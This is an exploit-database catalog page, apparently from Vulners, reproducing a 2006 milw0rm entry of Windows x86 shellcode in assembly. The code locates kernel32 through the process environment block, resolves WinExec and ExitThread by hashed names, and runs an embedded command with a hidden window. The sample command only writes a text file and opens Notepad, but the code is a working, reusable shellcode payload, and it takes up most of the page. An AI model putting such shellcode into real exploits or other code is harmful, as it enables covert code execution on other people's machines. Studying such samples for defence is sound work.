Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

win32 WinExec Command Parameter 104+ bytes

🗓️ 24 Jan 2006 00:00:00Reported by WeissType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 46 Views

Windows API code for WinExec with ExitThrea

Code
;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall

ROL_CONSTANT equ 5

mrol macro iNum:req,iBits:req
   exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

mror macro iNum:req,iBits:req
   exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

hashapi macro szApi
   local dwApi

   dwApi = 0

   forc x,szApi
      dwApi = dwApi + '&x'
      dwApi = mrol(dwApi,ROL_CONSTANT)
   endm
   dwApi = mrol(dwApi,ROL_CONSTANT)
   dw (dwApi and 0ffffh)
endm

.code

   assume fs:nothing

code_start:
   jmp load_data
setup_parameters:
   pop ebp
   xor ecx,ecx
   push ecx                                 ; ExitThread() exitcode
   push ecx                                 ; SW_HIDE
   mov cl,(cmd_end-api_hashes)              ; limit of 255 bytes per command
   inc byte ptr[ebp+ecx]
   lea eax,[ebp+(cmd_string-api_hashes)]
   push eax                                 ; WinExec command string
get_k32_base:
   mov cl,30h
   mov eax,fs:[ecx]
   mov eax,[eax+0ch]
   mov esi,[eax+1ch]
   lodsd
   mov ebx,[eax+08h]
get_api_loop:
   mov eax,[ebx+3ch]
   mov eax,[ebx+eax+78h]
   lea esi,[ebx+eax+1ch]
   mov cl,3
load_rva:
   lodsd
   add eax,ebx
   push eax
   loop load_rva
   pop ebp
   pop edi
load_api:
   mov esi,[edi+4*ecx]
   add esi,ebx
   xor eax,eax
   cdq
hash_api:
   lodsb
   add edx,eax
   rol edx,ROL_CONSTANT
   dec eax
   jns hash_api
   inc ecx
   mov eax,[esp+4]
   cmp dx,word ptr[eax]
   jne load_api
   pop eax
   movzx edx,word ptr[ebp+2*ecx-2]
   add ebx,[eax+4*edx]
   pop esi
   call ebx
   lodsw
   jmp get_k32_base
load_data:
   call setup_parameters
api_hashes:
   hashapi <WinExec>
   hashapi <ExitThread>
code_end:

cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1

end code_start

; milw0rm.com [2006-01-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jan 2006 00:00Current
0.5Low risk
Vulners AI Score0.5
windows apiwinexecexitthreaddynamic runtime assemblyoctober 2006code examplehash lookuprelocateable codelinkingtestingassembly codesecurity document
46